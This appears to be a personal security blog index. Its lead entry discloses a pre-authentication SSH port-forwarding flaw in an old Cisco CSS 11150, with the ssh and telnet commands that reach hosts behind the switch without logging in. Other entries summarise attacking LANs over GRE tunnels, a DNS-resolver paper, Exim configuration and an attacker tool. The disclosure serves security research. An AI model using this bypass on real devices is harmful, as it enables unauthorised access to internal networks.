Cisco Content Services Switch pre-auth ssh port forwarding vulnerability (21 Oct 2011)
Ok, I will admit, the Cisco CSS 11150 is old (this one was running software version 07.40.00.04). But I still think this is useful information; I wasn't able to find this particular bug documented anywhere. Anyway, the deal is this: if the CSS is running SSHd, it is possible to set up local (and possibly remote) port forwarding without having to authenticate. E.g.:
$ ssh -L 11123:hostonotherside:23 csshost
User Access Verification

Username:
... will allow the attacker to do:
$ telnet 127.0.0.1 11123
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
login:
And get a login prompt on the host on the other side of the CSS. This was certainly useful in my case. One caveat: the CSS will time out the unauthenticated ssh login, so the forwarded tunnel only stays open for a short window.
Tunneling between a Cisco and an OpenBSD system to attack LAN targets (07 Sep 2011)
A few words on how to create a GRE tunnel together with NAT to attack systems on a remote LAN. Look at the really awful graphic here. Keywords: compromise, cisco, openbsd, gre tunnel, nat, attack tools
Getting WWAN to work at full speed on a T61p (28 Jul 2008)
I recently got a Lenovo T61p with a nice data plan, but found that by default, Ubuntu 8.04 didn't give me the full speed of the onboard Sierra Wireless MC8755 device. After some trial and error and some Googling, I got it working at full speed and put the effort into words here.
Pheasting on the Crumbs of Misconfigured Networks (31 Jan 2006)
This is a PDF of a paper I wrote last year about poorly configured DNS resolvers. While it's not rocket science, it's interesting that it happens as often as it does. Watch this space for updates to statistics. (Keywords: phisting, dns, resolv.conf, isa server)
Configuring the Exim MTA for SMTP AUTH and TLS (2005?)
SMTP AUTH is great. Configuring your MTA to support this ensures that all your users can use the mail server when they're out on the road. But unless you ensure that the session is encrypted, your users' credentials may find themselves in the hands of spammers or worse (ensure that your server's certificate is trusted to prevent man-in-the-middle attacks!). Configure Exim so that it supports TLS, then have a look here for a quick description on how to configure SMTP AUTH securely.
Wonder what 'lomscan.exe' is? (ca. 2001)
It's part of an attacker's toolset. A short note on it can be found here.
Need a simple configuration for a Cisco ISDN (BRI) router? (ca. 1999)
Look here. This works (worked?) with BT ClickFree. Probably a discontinued product now.